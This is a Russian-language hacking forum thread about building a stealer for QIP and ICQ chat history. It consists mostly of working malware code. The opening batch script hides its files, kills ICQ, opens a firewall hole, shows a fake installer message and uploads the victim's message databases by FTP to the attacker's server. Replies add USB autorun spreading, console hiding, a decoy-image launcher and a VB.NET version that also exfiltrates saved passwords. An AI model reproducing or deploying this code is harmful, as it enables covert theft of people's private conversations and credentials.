Форум АНТИЧАТ - Крадем историю QIP и ICQ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)

- - Крадем историю QIP и ICQ (https://forum.antichat.xyz/showthread.php?t=175086)

[EasyHack] Крадем историю QIP и ICQ

вот сделал батник тут недавно, впринципе делал ради одной жертвы, но непригодился в последующем...
был бы очень рад каким нибудь дополнениям к нему и усовершенствованиям. также интересует аспект палевности данного батника, хотел бы узнать где он может запалится и на чем если что.

Код:

@echo off

@attrib "%CD%\zip32.exe" +h +s

@attrib "%CD%\ftpserv.cmd" +h +s

@attrib "%CD%\grab.bat" +h +s

@taskkill /f /IM ICQ.exe

@netsh firewall add allowedprogram C:\windows\system32\ftp.exe ENABLE

@mkdir c:\windows\dump_rep

@echo msgbox "........................................................."+chr(13)+chr(13)+"Please wait now..."+chr(13)+chr(13)+"Installing..."+chr(13)+chr(13)+".........................................................",4096,"The Middler! v.0.133 beta">c:\windows\alrt.vbs

@start c:\windows\alrt.vbs

@ping 1.1.1.1 -n 1 -w 10000

@copy "%APPDATA%\ICQ\*********\Messages.mdb" "c:\windows\dump_rep\dump_ICQ.bin" /y

@zip32 "C:\Program Files\QIP\Users" "c:\windows\debug\dump_QIP_new.zip"

@copy "c:\windows\debug\dump_QIP_new.zip" "c:\windows\dump_rep\dump_QIP_new.bin" /y

@del "c:\windows\debug\dump_QIP_new.zip"

@zip32 "%APPDATA%\QIP\Profiles" "c:\windows\debug\dump_QIP_old.zip"

@copy "c:\windows\debug\dump_QIP_old.zip" "c:\windows\dump_rep\dump_QIP_old.bin" /y

@del "c:\windows\debug\dump_QIP_old.zip"

@ftp -s:"%CD%/ftpserv.cmd"

@echo msgbox "........................................................."+chr(13)+chr(13)+"Error 1251"+chr(13)+chr(13)+".........................................................",4096,"The Middler! v.0.133 beta">c:\windows\alrtt.vbs

@attrib "%CD%\zip32.exe" -h -s

@attrib "%CD%\ftpserv.cmd" -h -s

@attrib "%CD%\grab.bat" -h -s

@del "%CD%\zip32.exe"

@del "%CD%\ftpserv.cmd"

@del "%CD%\grab.bat"

@start c:\windows\alrtt.vbs

+ сервер

Код:

o tvoi.ftp.com

login

password

binary

cd dmp

send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin

send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin

send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin

bye

упаковываем этот батник вместе с сервером с помощью Bat To Exe Converter v1.5

как?

1) как главный файл для компиляции выбираем тело граббера
2) настраиваем: Invisible Application, Temporary Directory, Delete At Exit, Overwrite Existing Files
3) на вкладке Include добавляем (Add) файлы : наш фтп сервер (допустим ftpserv.cmd) и прогу для архивации истории и папок квипа - zip32.exe
4) на вкладке Versioninformations добавляем иконку дистрибутива
5) нажимаем Compile
6) готово

как все это работает?

после запуска нашего экзешника в %temp% распакуется 3 файла - тело граббера, фтп сервачок, прога для архивации (консольная) - zip32.exe.
все эти файлы будут скрыты - как "скрытый" и "системный".
дальше убиваем процесс ICQ.ехе - иначе скопировать файлы истории аськи невозможно.
добавляем в исключения вин-файрволла прогу ftp.exe - стандартный фтп клиент для виндовозов.
создаем папку для копии нашей истории - c:\windows\dump_rep.
создаем файл на VBS - простое окно с текстом, якобы установки проги "The Middler" - уж что это за прога итд - тут зависит от вашей фантазии.
делаем паузу в 10 секунд, чтобы все операции были окончательно завершены.
копируем файл истории жертвы из ICQ в нашу папку dump_rep.
архивируем один из возможных путей истории квипа - папку C:\Program Files\QIP\Users.
перемещаем ее тоже в папку dump_rep.
пробуем тоже самое с %USERPROFILE%\Application Data\QIP\Profiles
открываем фтп сервер, который заливает на наш фтп данные файлы.
убираем аттрибуты "скрытый" и "системный" с наших файлов и удаляем их.
запускаем очередное обаманное окно при помощи VBS - мол при установке проги "The Middler" произошла ошибка 1251.

качаем:

Bat To Exe Converter v1.5
zip32.exe
Setup.ico

P.S.
незаываем написать ICQ номер жертвы вот тут:

Код:

@copy "%USERPROFILE%\Application Data\ICQ\NOMER_TUT\Messages.mdb"

P.S.S.
авторан с флехи:

Код:

[autorun] 

shellexecute=compiled.exe

где compiled.exe это наш скомпилированный граббер. только придется удалить "запуск установки The Middler" - чтобы вообще без палева

Тестированно на winlogon.exe

1\ %USERPROFILE%\Application Data\ = %APPDATA% --> упрощаем код, вес
2\ инфа не обязательно в %APPDATA%, может QIP ставили для всех пользователей ?) т.е. в %ALLUSERSPROFILE%\Application Data\ ;)
3\ QIP 2005 могли и не в Program Files установить + винда не обязательно на диске C, но я сам хз, как это лучше сделать, ну как минимум %ProgramFiles%\QIP\

а насчёт палевности:
допустим запускаем мы его с флэшки:

1\ авторан:

Код:

[autorun] 

shellexecute=hide_console bat.bat

где hide_console прога, я думаю понятно какого назначения, найти в сети интернет не сложно)

2\дописываем в конец батника start ..

Цитата:

+ винда не обязательно на диске C

%windir%

Цитата:

Сообщение от Antonio Falkone

%windir%

я о Program Files
+ это тоже

Цитата:

винда не обязательно на диске C

а кто сказал что квип или ася именно там где винда?

Цитата:

Сообщение от |qbz|

а кто сказал что квип или ася именно там где винда?

вот в этом то и дело :(
в этом случае вообще тока поиск по реестру поможет :(

Цитата:

в этом случае вообще тока поиск по реестру поможет

но как это сделат на бат?

Цитата:

Сообщение от |qbz|

но как это сделат на бат?

хз, я над подобным уже неделю сижу :(
реализация сложная, но видимо возможна, должно быть что-то типа:
<вывод нужной строки из reg, regedit> --> дальше по конвееру |find <нужное> --> задание это переменной --> юзаем

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Un install\Qip Infium" /v installlocation - вывод директории, куда установили...

дамп создает, но на фтп не отправляет, в чем может быть дело? (специально создал файл dump_ICQ.bin в папке C:\WINDOWS\dump_rep весом 1 кб). запускаю приложение (формат .cmd) сервера в котором у меня прописано

PHP код:


		
			
o ftp.narod.ru

мой_логин

мой_пароль

binary

cd dmp

send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin

send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin

send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin

bye

в чем дело? спасибо

napishi v konce tela batnika:

cmd /k

potom zapusti
uvidish gde oshibka

возможно скоро сам буду юзать ) кто юзал - все ок?

на хэкере похожую хрень выкладывали, заточенную под флешку.

Цитата:

на хэкере похожую хрень выкладывали, заточенную под флешку.

линк в студию

Не издевайтесь на bat - vb, delphi,C#/C++.

P.S на C# строчек 15 выйдет.

а в опере мини так можно сделать?

Цитата:

Сообщение от noxjoker

Не издевайтесь на bat - vb, delphi,C#/C++.

P.S на C# строчек 15 выйдет.

по возможности напиши статью,было б очень здорово..спс

может пригодиться

вот кто небудь сделал бы такую хрень, под винд XP, 7 универсальную для QIP(qip infinium) ICQ - было бы здорово !

на VB напишите кто нибудь))

отрубил ведение истории и отчистил все логи, можете меня не хекать =)

помогите,в какой programe прочитать ICQ.bin спасибо

переименуй на icq.mdb и открывай через microsoft access

А если я делал для icq 7 ? там файл называется Messages.qdb ? :)) sps

http://www.postimage.org/image.php?v=aVhjeMJ
Что делать при этой ошибки + alrt.vbs a alrtt.vbs

Цитата:

Сообщение от meisterr

на VB напишите кто нибудь))

Создаем новый проект Windows Forms
Правим свойства формы

Код:

  Me.ShowIcon = False

        Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow

        Me.ShowInTaskbar = False

        Me.WindowState = System.Windows.Forms.FormWindowState.Minimized

Создаем функцию (копируем код ниже)

Код:

  

 Private Function zip(ByVal filenasdasfaame As String, ByVal zipfilename As String) As Boolean

        Try

            filenasdasfaame = specstr(filenasdasfaame)

            zipfilename = specstr(zipfilename)

            Dim strZIPHeader As String

            strZIPHeader = Chr(80) & Chr(75) & Chr(5) & Chr(6) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0)

            Dim fso = CreateObject("Scripting.FileSystemObject")

            Dim tf = fso.CreateTextFile(zipfilename)

            tf.Write(strZIPHeader)

            tf.Close()

            With CreateObject("Shell.Application")

                .NameSpace(zipfilename.ToString).CopyHere(filenasdasfaame.ToString)

            End With

            '(MsgBox("Обновление для Microsoft Windows готовы к установке", MsgBoxStyle.Information))

            Threading.Thread.Sleep(3000)

            z = 1

        Catch ex As Exception

        End Try

        If z <> 0 Then Return True Else Return False

    End Function  



    Private Function _prockill(ByVal procname As String) As Boolean       

        Try

            For Each proc In Process.GetProcessesByName(procname)

                proc.Kill() : z = 1

            Next

            If z = 1 Then Return True Else Return False

        Catch ex As Exception

            Return False

        End Try

    End Function



    Private Function _findfile(ByVal parent As String, ByVal filename As String) As Boolean

     Try          

            parent = specstr(parent)

            For Each fs As IO.FileInfo In My.Computer.FileSystem.GetDirectoryInfo(parent).GetFiles(filename, SearchOption.AllDirectories)

              zip(fs.FullName,fs.FullName & ".zip")



My.Computer.Network.UploadFile(fs.FullName & ".zip", ftp://kuda.ru" & CChar("/") & fs.Name.Replace(fs.Extension, "") & "-" & z.ToString & fs.Extension,user,pasw)

Microsoft.visualBasic.Kill(fs.FullName & ".zip")

                z += 1

        Next

    Catch ex As Exception

    End Try

        If z <> 0 Then Return True Else Return False 

    End Function

Создаем обработчик события загрузки формы (MyBase.Load)
Пишем туда что-то примерно такое:

Код:

Dim p(10) as string

Dim it as integer = 0



For each s in My.Computer.FileSystem.Devices

  if s.isReady then if new IO.DirectoryInfo(s.Root & "\Program Files\QIP").Exist then p(it)=s.Root & "\Program Files\QIP":it+=1

Next

For each s as string in p

 if s<>Nothing AND s<>"" then

 if My.Computer.Network.isAvailable then

 for each ss as string in IO.DirectoryInfo(s & "\Users").GetDirectoryes()

  zip(ss & "\History",ss & ".zip")

  My.Computer.Network.UploadFile(ss & "\History & ".zip","ftp://kuda.ru",user,pasw)

  My.Computer.Network.UploadFile(ss & "\config.ini","ftp://kuda.ru",user,pasw)

  Microsoft.VisualBasic.Kill(ss & "\History & ".zip"")

 end if

Next 

end if

_prockill("ICQ")

_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.mdb")

_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.qdb")

Писал без компилятора, наверняка там будут синтаксические ошибки, но думаю вы разберетесь

Также можно всунуть в нескольких местах обработчик исключений с нулевым исключением - для того чтоб ошибка не выскочила, если вообще будет таковая

В общем попробуйте ;)

P.S Кстати приведенный код крадет не только историю, но и файлы паролей (если они сохранены)
Актуально для:

ICQ 6,
ICQ Lite
QIP 2005

Achtung!!!
Написано исключительно в образовательных целях, за практическое использование данного листинга, автор не несет ответственности!

Цитата:

Сообщение от ichechen

Создаем новый проект Windows Forms
Правим свойства формы

Код:

  Me.ShowIcon = False

        Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow

        Me.ShowInTaskbar = False

        Me.WindowState = System.Windows.Forms.FormWindowState.Minimized

Создаем функцию (копируем код ниже)

Код:

  

 Private Function zip(ByVal filenasdasfaame As String, ByVal zipfilename As String) As Boolean

        Try

            filenasdasfaame = specstr(filenasdasfaame)

            zipfilename = specstr(zipfilename)

            Dim strZIPHeader As String

            strZIPHeader = Chr(80) & Chr(75) & Chr(5) & Chr(6) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0)

            Dim fso = CreateObject("Scripting.FileSystemObject")

            Dim tf = fso.CreateTextFile(zipfilename)

            tf.Write(strZIPHeader)

            tf.Close()

            With CreateObject("Shell.Application")

                .NameSpace(zipfilename.ToString).CopyHere(filenasdasfaame.ToString)

            End With

            '(MsgBox("Обновление для Microsoft Windows готовы к установке", MsgBoxStyle.Information))

            Threading.Thread.Sleep(3000)

            z = 1

        Catch ex As Exception

        End Try

        If z <> 0 Then Return True Else Return False

    End Function  



    Private Function _prockill(ByVal procname As String) As Boolean       

        Try

            For Each proc In Process.GetProcessesByName(procname)

                proc.Kill() : z = 1

            Next

            If z = 1 Then Return True Else Return False

        Catch ex As Exception

            Return False

        End Try

    End Function



    Private Function _findfile(ByVal parent As String, ByVal filename As String) As Boolean

     Try          

            parent = specstr(parent)

            For Each fs As IO.FileInfo In My.Computer.FileSystem.GetDirectoryInfo(parent).GetFiles(filename, SearchOption.AllDirectories)

              zip(fs.FullName,fs.FullName & ".zip")



My.Computer.Network.UploadFile(fs.FullName & ".zip", ftp://kuda.ru" & CChar("/") & fs.Name.Replace(fs.Extension, "") & "-" & z.ToString & fs.Extension,user,pasw)

Microsoft.visualBasic.Kill(fs.FullName & ".zip")

                z += 1

        Next

    Catch ex As Exception

    End Try

        If z <> 0 Then Return True Else Return False 

    End Function

Создаем обработчик события загрузки формы (MyBase.Load)
Пишем туда что-то примерно такое:

Код:

Dim p(10) as string

Dim it as integer = 0



For each s in My.Computer.FileSystem.Devices

  if s.isReady then if new IO.DirectoryInfo(s.Root & "\Program Files\QIP").Exist then p(it)=s.Root & "\Program Files\QIP":it+=1

Next

For each s as string in p

 if s<>Nothing AND s<>"" then

 if My.Computer.Network.isAvailable then

 for each ss as string in IO.DirectoryInfo(s & "\Users").GetDirectoryes()

  zip(ss & "\History",ss & ".zip")

  My.Computer.Network.UploadFile(ss & "\History & ".zip","ftp://kuda.ru",user,pasw)

  My.Computer.Network.UploadFile(ss & "\config.ini","ftp://kuda.ru",user,pasw)

  Microsoft.VisualBasic.Kill(ss & "\History & ".zip"")

 end if

Next 

end if

_prockill("ICQ")

_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.mdb")

_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.qdb")

ICQ 6,
ICQ Lite
QIP 2005

у меня большая просьба ;) если бы ты не мог сделать видео по этому , я только начинаю усваивать программу но много чего не знаю a кокрас вот это мне очень надо спасибо если будет время

автору респект

ТС клевая статья

Народ, архивируйте базы, прежде чем их качать, иногда этот процесс может уменьшить размер баз в десятки раз...

Цитата:

Народ, архивируйте базы, прежде чем их качать, иногда этот процесс может уменьшить размер баз в десятки раз...

Цитата:

@zip32...

Кто юзал ето батник прошу написать о результатах...

Цитата:

Кто юзал ето батник прошу написать о результатах...

я на себе тестил и на винлогоне, все гуд

протестил, все работает!) Спасибо)

Если кто-то нормально скомпилировал функцию добавления файла в zip-архив (не важно на каком языке) Компильните (!!!) и выложите плз простейшую реализацию одной лишь этой функции. Хотел когда-то написать аналог зипования средствами винь на асм, дошел до NAMESPACE.COPYHERE, все отработало на ура, только в архиве файла так и не увидел, после чего решил забить так как мозг уже кипел
P.S. Вот хотелось бы взглянуть на рабочий вариант из-под отладчика. :)

Цитата:

Сообщение от |qbz|

я на себе тестил и на винлогоне, все гуд

Odin vopros esli mozhno grab.exe skryt naprimer v Kartinku a pri otkrytie chtoby zapustilsia grab.exe no prito evo nebylo vidno ? kakto :) sps

просто добавь в начало батника строку

start "%CD%\kartinka.jpg"

и добавь в Include файл картинки с именем kartinka.jpg

Написать одно,а вот на видео с самого начало записать,да и понятней все будет.Может кто действительно все на видео с самого начала запишет у кого время будет?

nu zapishu esli vremya budet...